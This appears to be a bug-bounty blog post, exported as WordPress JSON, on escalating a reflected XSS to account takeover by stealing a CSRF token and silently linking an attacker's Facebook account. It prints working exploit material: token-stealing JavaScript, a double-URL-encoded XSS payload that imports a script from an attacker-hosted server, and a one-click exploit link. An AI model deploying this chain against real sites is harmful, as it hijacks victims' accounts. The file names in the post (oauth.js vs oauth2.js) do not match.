{"id":81,"date":"2026-03-07T03:59:37","date_gmt":"2026-03-07T03:59:37","guid":{"rendered":"https:\/\/stories.secone4all.com\/?p=81"},"modified":"2026-03-09T09:18:30","modified_gmt":"2026-03-09T09:18:30","slug":"how-i-used-reflected-xss-cors-to-get-1-click-oauth-misconfiguration","status":"publish","type":"post","link":"https:\/\/stories.secone4all.com\/index.php\/2026\/03\/07\/how-i-used-reflected-xss-cors-to-get-1-click-oauth-misconfiguration\/","title":{"rendered":"How I Used Reflected XSS + CORS + CSRF to Get 1-Click OAuth Misconfiguration"},"content":{"rendered":"\n<p class=\"has-black-color has-blush-bordeaux-gradient-background has-text-color has-background has-link-color wp-elements-5362171f0a9f1cd6c2a9b7032133ca0b\"><strong>Hellllllllo brothers,<br>Today I will show how I escalated Reflected XSS to One Click or even Zero Click ATO via escalating the XSS + CORS to OAuth Misconfiguration.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-pale-cyan-blue-background-color has-background\"><strong>While I was testing, I registered an account and started discovering and browsing all features on my target to better understand the target. During this process, I found on the Settings page that I can connect my account with social login like Facebook or Google login. When I saw that, I said that I should test OAuth Misconfiguration here; this is something known for all bug bounty. To better understand this feature and how it&#8217;s working, this makes it easy for you to log in to your account with your Google account or Facebook account. When you click on connect to Facebook, for example, what happens.<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>You are redirected to your Facebook account.<\/strong><br><\/li>\n\n\n\n<li><strong>You click on Sign in with Facebook.<\/strong><br><\/li>\n\n\n\n<li><strong>Now your account is connected with your Facebook account.<\/strong><br><\/li>\n<\/ol>\n\n\n\n<p><strong>This means you can log in to your account using your Facebook account. Based on this information, if we can connect the victim&#8217;s account with our Facebook account, it will allow us to log in to the victim&#8217;s account using our Facebook account.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><em>PoC Steeps:<\/em><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I started by going to connect your Facebook account and clicked on connect to my Facebook account. When I intercepted the final request, it was as shown below<\/strong> :&#8212;&#8212;&gt;                                                                                                                 <\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"92\" src=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-1024x683.png\" alt=\"\" class=\"wp-image-92\" srcset=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-1024x683.png 1024w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-300x200.png 300w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585-768x512.png 768w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/IMG_3585.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-black-background-color has-background\"><strong>Based on the above request, if we can craft a CSRF attack to make the victim submit the above request, our Facebook account will be connected to the victim&#8217;s account.<\/strong> . <\/p>\n\n\n\n<details class=\"wp-block-details\"><summary><strong>The <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color is-layout-flow wp-block-details-is-layout-flow\">external_account_id<\/mark> refers to the attacker&#8217;s Facebook account.<\/strong><\/summary>\n<p><strong>Let&#8217;s analyze the request and see how we can force the victim to submit this malicious request, which will give us full control of the victim&#8217;s account.<\/strong> .<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"has-pale-cyan-blue-color has-text-color has-link-color wp-elements-21f9c090b235d6af5e4a1f1362fcd064\"><strong>If we look at the request, it has <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">Content-Type: application\/json<\/mark><\/code>, so normally it&#8217;s difficult to get CSRF here, and also there is <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> that works as a CSRF token. So if we look at all of these, we would say it&#8217;s impossible to do anything, but as an amazing hacker, you should never give up. Let&#8217;s dive into the next part.<\/strong> <\/li>\n<\/ul>\n\n\n\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n\n\n\n<p class=\"has-vivid-cyan-blue-background-color has-background\"><strong>I continued testing on my target, and after around 2 days I found XSS on the same domain. That&#8217;s great to test my previous scenario. XSS means that we can execute JS code, and the XSS is on the same domain. This means that we can execute JS code on the same domain, and the application trusts any JS code execution that is coming from the same domain. That&#8217;s great. Now we can ignore the Same Origin Policy(SOP) that could prevent us from executing the JS code.<\/strong><\/p>\n\n\n\n<p><strong>Now I thought about how I can send this request using JS code:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code alignwide has-cyan-bluish-gray-background-color has-background\"><code>POST \/api\/v3\/ajax\/member\/external-account\/link HTTP\/2\nHost: www.target.com\nCookie: Cookie\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko\/20100101 Firefox\/148.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.9\nAccept-Encoding: gzip, deflate, br\nReferer: https:\/\/www.target.com\/your\/account\/security\nX-Page-Guid: 101fba8b4af8.5455445.00\nContent-Type: application\/json\nX-Csrf-Token: 3:1772845972:GQtnXMLEiQY_awcp7g2WgF4sHstC:f213b523bd14144e92ffeda0b0be69d2059a986fdffbc69936acadce666925c4\nX-Detected-Locale: USD|en-US|EG\nContent-Length: 102\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=4\nTe: trailers\n\n{\"account_type\":\"facebook\",\"external_account_id\":\"122144551334981997\",\"id_token\":\"12210458215434981997\"}<\/code><\/pre>\n<\/details>\n\n\n\n<p class=\"has-pale-cyan-blue-background-color has-background\"><strong>Before I thought about how I can submit the request using JS, I thought about how I can add <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> to the request, because if I submit the request without including <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code>, the request doesn&#8217;t work due to the missing <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token<\/mark>. So this makes this issue a very complex one, but as I mentioned above, take your cup of tea and neverrrrrrr give up, bro.<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong>Now I thought, is it possible to use CORS to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> and include it in the submit request PoC? After a long time, I was able to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> value using the script I will add. I found that when I browsed this endpoint, <code>https:\/\/www.target.com\/your\/account\/security<\/code>, I noticed that <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> is embedded in a meta tag in the HTML source code. Great, now I can send malicious JS code to get the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">X-Csrf-Token<\/mark><\/code> named <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">csrf_nonce<\/mark><\/code>. Here is the PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-green-cyan-color has-black-background-color has-text-color has-background has-link-color wp-elements-4c37e976b09ee0bdf48b58374d1b0a0d\"><code>async function fetchCsrfToken() {\n    try {\n        \/\/ Fetch the security page (cookies must be sent!)\n        let resp = await fetch(\"https:\/\/www.target.com\/your\/account\/security\", {\n            method: \"GET\",\n            credentials: \"include\" \/\/ \ud83d\udd11 send cookies\n        });\n\n        let text = await resp.text();\n\n        \/\/ Parse the HTML response\n        let parser = new DOMParser();\n        let doc = parser.parseFromString(text, \"text\/html\");\n\n        \/\/ Extract the meta tag content\n        let meta = doc.querySelector('meta&#91;name=\"csrf_nonce\"]');\n        return meta ? meta.content : null;\n    } catch (e) {\n        console.error(\"Error fetching CSRF token:\", e);\n        return null;\n    }\n}\n<\/code><\/pre>\n\n\n\n<p><strong>Now we need the script that combines stealing the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token<\/mark> and submitting the request, including the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">CSRF token.<\/mark><\/strong><\/p>\n\n\n\n<p><strong>I am not perfect at JS code, but now you don&#8217;t need to take a very long time learning programming languages because you can use AI to fix errors in your script. Here is my PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-black-background-color has-text-color has-background has-link-color wp-elements-3dbdddc67d15d1a79999a5520f8e0ad4\" style=\"color:#12ea24\"><code>async function fetchCsrfToken() {\n    try {\n        \/\/ Fetch the security page (cookies must be sent!)\n        let resp = await fetch(\"https:\/\/www.target.com\/your\/account\/security\", {\n            method: \"GET\",\n            credentials: \"include\" \/\/ \ud83d\udd11 send cookies\n        });\n\n        let text = await resp.text();\n\n        \/\/ Parse the HTML response\n        let parser = new DOMParser();\n        let doc = parser.parseFromString(text, \"text\/html\");\n\n        \/\/ Extract the meta tag content\n        let meta = doc.querySelector('meta&#91;name=\"csrf_nonce\"]');\n        return meta ? meta.content : null;\n    } catch (e) {\n        console.error(\"Error fetching CSRF token:\", e);\n        return null;\n    }\n}\n\nasync function submitRequest() {\n    const csrf = await fetchCsrfToken(); \/\/ Get CSRF token first\n    if (!csrf) {\n        console.error(\"CSRF token not found. Aborting request.\");\n        return;\n    }\n\n    var xhr = new XMLHttpRequest();\n    xhr.open(\"POST\", \"https:\/\/www.target.com\/api\/v3\/ajax\/member\/external-account\/link\", true);\n\n    \/\/ Required headers\n    xhr.setRequestHeader(\"accept\", \"*\/*\");\n    xhr.setRequestHeader(\"accept-language\", \"en-US,en;q=0.5\");\n    xhr.setRequestHeader(\"content-type\", \"application\/json\");\n\n    \/\/ Add CSRF token header\n    xhr.setRequestHeader(\"X-Csrf-Token\", csrf);\n\n    \/\/ Include victim cookies\n    xhr.withCredentials = true;\n\n    \/\/ Body to link external account\n    var body = JSON.stringify({\n        account_type: \"facebook\",\n        external_account_id: \"759525443476339\",\n        id_token: \"759525443476339\"\n    });\n\n    xhr.send(body);\n}\n\n\/\/ Execute automatically\nsubmitRequest();\n<\/code><\/pre>\n\n\n\n<details class=\"wp-block-details\"><summary><strong>If we look at the first section, we will see that this section gets the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color is-layout-flow wp-block-details-is-layout-flow\">CSRF token<\/mark>. Section two uses the captured<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\"> CSRF token <\/mark>and submits the body parameters as they exist in the HTTP request. Now we have the script that can submit the ATO request for us. Now we reach the final step: how we can use this script. As I mentioned above, we will submit it via <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">XSS found on the same domain<\/mark>. The XSS was via <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">double URL encode<\/mark>, and this is the payload.<\/strong><\/summary>\n<pre class=\"wp-block-code has-vivid-red-color has-pale-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-8cd075fbf8d0d4174729c30c4ff30871\"><code>%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A<\/code><\/pre>\n<\/details>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong>Now we need to host the above script on our <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">server (VPS)<\/mark> in a file that should end with <code>.js<\/code>. For example, I will name it <code>oauth.js<\/code>, and call this script using the below XSS payload via the import function.<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-ffd53546ef0583f86c1260a7b19ccdbe\"><code>%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A\n<\/code><\/pre>\n\n\n\n<p><strong>This is the encoded version of the payload:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-luminous-vivid-orange-color has-black-background-color has-text-color has-background has-link-color wp-elements-b6355144121b405a3b11f01d286cb438\"><code>\"&gt;&lt;A HRef=\/\/myserver.com\/oauth2.js AutoFocus &amp;#62 OnFocus\f=import(href)&gt;<\/code><\/pre>\n\n\n\n<p><strong>The final PoC:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-white-color has-black-background-color has-text-color has-background has-link-color wp-elements-567f0590e78139d4c65892bb033c163e\"><code>https:&#47;&#47;www.target.com\/codeascraft\/search\/%2522%253E%253CA%2520HRef%253D%252F%252Fmyserver%252Ecom%252Foauth2%252Ejs%2520AutoFocus%2520%2526%252362%2520OnFocus%250C%253Dimport%2528href%2529%253E%250A<\/code><\/pre>\n\n\n\n<p class=\"has-vivid-green-cyan-background-color has-text-color has-background has-link-color wp-elements-1840d69baa9654a4312ece6c7e5601c7\" style=\"color:#2100d1\"><strong>Now when the victim visits the final PoC link, my Facebook account (attacker&#8217;s account) will be connected to the victim&#8217;s account, allowing me to log in to the victim&#8217;s account and get full control of the victim&#8217;s account.<\/strong><\/p>\n\n\n\n<p>This is the Respond:<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"83\" src=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-1024x683.png\" alt=\"\" class=\"wp-image-83\" srcset=\"https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-1024x683.png 1024w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-300x200.png 300w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer-768x512.png 768w, https:\/\/stories.secone4all.com\/wp-content\/uploads\/2026\/03\/reer.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-pale-pink-color has-pale-ocean-gradient-background has-text-color has-background has-link-color wp-elements-e5fb5d40411d9ea429ffabf9c468c76d\"><strong>Thank you, brothers. I hope this was useful for you.<\/strong> \ud83d\udc4d<\/p>\n\n\n\n<ul class=\"wp-block-social-links is-layout-flex wp-block-social-links-is-layout-flex\"><li class=\"wp-social-link wp-social-link-linkedin  wp-block-social-link\"><a href=\"https:\/\/www.linkedin.com\/in\/muhammad-mubarak-941b85290?utm_source=share&#038;utm_campaign=share_via&#038;utm_content=profile&#038;utm_medium=ios_app\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M19.7,3H4.3C3.582,3,3,3.582,3,4.3v15.4C3,20.418,3.582,21,4.3,21h15.4c0.718,0,1.3-0.582,1.3-1.3V4.3 C21,3.582,20.418,3,19.7,3z M8.339,18.338H5.667v-8.59h2.672V18.338z M7.004,8.574c-0.857,0-1.549-0.694-1.549-1.548 c0-0.855,0.691-1.548,1.549-1.548c0.854,0,1.547,0.694,1.547,1.548C8.551,7.881,7.858,8.574,7.004,8.574z M18.339,18.338h-2.669 v-4.177c0-0.996-0.017-2.278-1.387-2.278c-1.389,0-1.601,1.086-1.601,2.206v4.249h-2.667v-8.59h2.559v1.174h0.037 c0.356-0.675,1.227-1.387,2.526-1.387c2.703,0,3.203,1.779,3.203,4.092V18.338z\"><\/path><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">LinkedIn<\/span><\/a><\/li>\n\n<li class=\"wp-social-link wp-social-link-medium  wp-block-social-link\"><a href=\"https:\/\/medium.com\/@mohammed01550038865\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13.2,12c0,3-2.4,5.4-5.3,5.4S2.6,15,2.6,12s2.4-5.4,5.3-5.4S13.2,9,13.2,12 M19.1,12c0,2.8-1.2,5-2.7,5s-2.7-2.3-2.7-5s1.2-5,2.7-5C17.9,7,19.1,9.2,19.1,12 M21.4,12c0,2.5-0.4,4.5-0.9,4.5c-0.5,0-0.9-2-0.9-4.5s0.4-4.5,0.9-4.5C21,7.5,21.4,9.5,21.4,12\"><\/path><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">Medium<\/span><\/a><\/li>\n\n<li class=\"wp-social-link wp-social-link-x  wp-block-social-link\"><a href=\"https:\/\/x.com\/mohamme31752968?s=21\" class=\"wp-block-social-link-anchor\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" version=\"1.1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13.982 10.622 20.54 3h-1.554l-5.693 6.618L8.745 3H3.5l6.876 10.007L3.5 21h1.554l6.012-6.989L15.868 21h5.245l-7.131-10.378Zm-2.128 2.474-.697-.997-5.543-7.93H8l4.474 6.4.697.996 5.815 8.318h-2.387l-4.745-6.787Z\" \/><\/svg><span class=\"wp-block-social-link-label screen-reader-text\">X<\/span><\/a><\/li><\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hellllllllo brothers,Today I will show how I escalated Reflected XSS to One Click or even Zero Click ATO via escalating the XSS + CORS to OAuth Misconfiguration. While I was testing, I registered an account and started discovering and browsing all features on my target to better understand the target. During this process, I found [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":83,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[5,7,4,6],"tags":[],"class_list":["post-81","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bug-bounty","category-bugcrowd","category-ethical-hacking","category-hackerone"],"acf":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/comments?post=81"}],"version-history":[{"count":10,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81\/revisions"}],"predecessor-version":[{"id":102,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/posts\/81\/revisions\/102"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/media\/83"}],"wp:attachment":[{"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/media?parent=81"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/categories?post=81"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/stories.secone4all.com\/index.php\/wp-json\/wp\/v2\/tags?post=81"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}